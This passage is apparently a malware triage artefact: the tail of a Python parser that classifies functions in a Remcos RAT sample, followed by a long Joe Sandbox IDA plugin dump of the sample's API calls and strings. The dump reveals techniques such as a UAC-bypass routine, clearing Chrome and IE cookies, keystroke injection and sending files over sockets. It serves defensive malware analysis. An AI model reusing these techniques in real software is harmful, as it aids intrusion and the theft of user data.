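    ("console banner with version", {"AllocConsole"}, lambda s: "Remcos v" in s),
    ("tcp/udp socket strings", set(), lambda s: {"tcp", "udp"} <= set(s)),
    ("write file, send, rename", {"CreateFileW", "WriteFile", "send", "MoveFileW"}, lambda s: True),
]

def classify(rec):
    if rec.apis and all(mod in ("LIBCMT", "LIBVCRUNTIME") for _, mod in rec.apis):
        return []                                # pure C runtime code, not the sample's logic
    names = {api for api, _ in rec.apis}
    return [label for label, need, pred in RULES if need <= names and pred(rec.strings)]

def remcos_version(records):
    for rec in records:                          # the version is the string after "Remcos v"
        if "Remcos v" in rec.strings and rec.strings[-1] != "Remcos v":
            return rec.strings[rec.strings.index("Remcos v") + 1]
    return None

def triage(text):
    records = parse_records(text)
    hits = [(rec.base, classify(rec)) for rec in records if classify(rec)]
    return {"functions": len(records), "version": remcos_version(records), "hits": hits}

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Two points the parser makes explicit: the "Memory Dump Source" offset separates code that lives in the main image at 00400000 from code in the module mapped at 10000000, and a record whose APIs are all LIBCMT/LIBVCRUNTIME is compiler runtime and can be dropped from the behaviour pass even though it matches a Yara rule on the page. Treat the "$$" handling as an assumption to confirm against a fresh export before relying on it for string extraction.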
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                                                                                  • MoveFileW.KERNEL32 ref: 00407AA5
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                  • String ID: .part
                                                                                                                                  • API String ID: 1303771098-3499674018
                                                                                                                                  • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                                                  • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                                                  APIs
                                                                                                                                  • SendInput.USER32 ref: 00419A25
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InputSend$Virtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1167301434-0
                                                                                                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __freea$__alloca_probe_16_free
                                                                                                                                  • String ID: a/p$am/pm$h{D
                                                                                                                                  • API String ID: 2936374016-2303565833
                                                                                                                                  • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                                                  • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                                                                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                  • _free.LIBCMT ref: 00444E87
                                                                                                                                  • _free.LIBCMT ref: 00444E9E
                                                                                                                                  • _free.LIBCMT ref: 00444EBD
                                                                                                                                  • _free.LIBCMT ref: 00444ED8
                                                                                                                                  • _free.LIBCMT ref: 00444EEF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                  • String ID: KED
                                                                                                                                  • API String ID: 3033488037-2133951994
                                                                                                                                  • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                                                  • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                                                                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                                                  APIs
                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Enum$InfoQueryValue
                                                                                                                                  • String ID: [regsplt]$xUG$TG
                                                                                                                                  • API String ID: 3554306468-1165877943
                                                                                                                                  • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                                  • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                                                                  • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                                                                                                                                  • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                                                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                                                                                                  • __fassign.LIBCMT ref: 0044B514
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                                                                                    • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                    • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                  • String ID: xUG$NG$NG$TG
                                                                                                                                  • API String ID: 3114080316-2811732169
                                                                                                                                  • Opcode ID: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                                                                                                  • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                                                                  • Opcode Fuzzy Hash: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                                                                                                                                  • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                  • String ID: .exe$8)3$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                  • API String ID: 3286818993-478932494
                                                                                                                                  • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                                                  • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                  • API String ID: 1133728706-4073444585
                                                                                                                                  • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                                                                  • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                                                  • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                                                  • _free.LIBCMT ref: 00450FC8
                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                  • _free.LIBCMT ref: 00450FD3
                                                                                                                                  • _free.LIBCMT ref: 00450FDE
                                                                                                                                  • _free.LIBCMT ref: 00451032
                                                                                                                                  • _free.LIBCMT ref: 0045103D
                                                                                                                                  • _free.LIBCMT ref: 00451048
                                                                                                                                  • _free.LIBCMT ref: 00451053
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                  • _free.LIBCMT ref: 100092AB
                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                  • _free.LIBCMT ref: 100092B6
                                                                                                                                  • _free.LIBCMT ref: 100092C1
                                                                                                                                  • _free.LIBCMT ref: 10009315
                                                                                                                                  • _free.LIBCMT ref: 10009320
                                                                                                                                  • _free.LIBCMT ref: 1000932B
                                                                                                                                  • _free.LIBCMT ref: 10009336
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                  • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                  • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                  APIs
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                                                  • int.LIBCPMT ref: 004111BE
                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                  • String ID: (mG
                                                                                                                                  • API String ID: 2536120697-4059303827
                                                                                                                                  • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                                                                  • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                  • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                                                  • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                                                  APIs
                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                  • CoUninitialize.OLE32 ref: 00407664
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                  • API String ID: 3851391207-1839356972
                                                                                                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                                                  Strings
                                                                                                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                                                  • UserProfile, xrefs: 0040BAE8
                                                                                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
